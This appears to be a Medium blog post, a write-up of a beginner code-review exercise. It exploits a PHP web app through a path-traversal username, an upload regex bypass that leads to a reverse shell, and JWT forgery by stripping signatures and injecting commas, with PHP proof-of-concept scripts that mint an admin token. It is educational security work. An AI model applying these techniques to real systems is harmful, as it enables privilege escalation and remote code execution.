Beginner Code Review (Part 2)

Broken Authorization for Privilege Escalation

Vulnerabilities used:

  • Lack of input sanitization
Due to the lack of input sanitization it is possible to register with the username ../files/admin. This will show the list of files available to the admin user.
The files folder does not have a “../files/admin” folder.

Unrestricted file upload to Remote Code Exec

Vulnerabilities used:

  • Broken Authorization
Figure 1 — The php code to add a file.
Figure 2 — Regex will match .pdf and allow the php file to be uploaded.
It is possible to upload a .php file.
The php file can be accessed without authentication and PHP code can be run.
Created a reverse shell on the php file and connected to it. Result is access to the host system as www-data.

JSON Web Token Privilege Escalation

Before beginning this walk through, here is a quick breakdown on the structure of JSON Web Tokens:

  • signature
  • verify
  • parse_json

Exploiting the verify function:

Figure 3 — jwt.php, line 22, verify function.
A JWT without the signature is still accepted.

Exploiting parse_json function:

The way the parse_json function works is by splitting up the string by the commas. The sign function contains no sanitization for special characters such as commas.

Parse_json function splits up the data by the commas.
Sign function has no sanitization for alphanumerical characters.
List of users in the application
Logging in as test”,”username:admin and dissecting the token.
The resultant view as use test”,”username:admin
It is possible to enumerate other usernames on the registration functionality.

Proof of concept code for exploiting JWT:

jwtverify.php

<?phpfunction verify($auth) {
list($h64,$d64,$sign) = explode(".",$auth);
print_r("h64:\t".$h64);
print_r("\nd64:\t".$d64);
print_r("\nsign:\t".$sign);
print_r("\n-----\n");
if (!empty($sign) and (signature($h64.".".$d64) != $sign)) {
die("Invalid Signature");
}
$header = base64_decode($h64);
$data = base64_decode($d64);
print_r("header:\t".$header);
print_r("\ndata:\t".$data);
print_r("\n......\n");
return parse_json($data);
}
function signature($data) {
return hash("sha256","donth4ckmebr0".$data);
}
function parse_json($str) {
$data = explode(",",rtrim(ltrim($str, '{'), '}'));
print_r("\n\n---------------\n\n");
$ret = array();
foreach($data as $entry) {
list($key, $value) = explode(":",$entry);
$key = rtrim(ltrim($key, '"'), '"');
$value = rtrim(ltrim($value, '"'), '"');
$ret[$key] = $value;
}
return $ret;
}
print_r(verify("eyJhbGciOiJIUzI1NiIsImlhdCI6MTU4ODE1OTU2MX0.eyJ1c2VybmFtZSI6InRlc3QiLCJ1c2VybmFtZTphZG1pbiIsfQ==.328a0231d16e6a67027132b7a4ce69dc6c3b8c1e865b070d982c5b3921a2ec11"));

jwtcreate.php

<?phpfunction sign($data) {
$header = str_replace("=","",base64_encode('{"alg":"HS256","iat":'.time().'}'));
$token = "{";
$token.= '"username:admin"';
$token .= "}";
$to_sign = $header.".".base64_encode($token);
return $to_sign.".".signature($to_sign);
}
function signature($data) {
return hash("sha256","donth4ckmebr0".$data);
}
print_r(sign(""));
print_r("\n");

What’s next

Next part in this series will be about the methodologies I took to perform the static code analysis.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store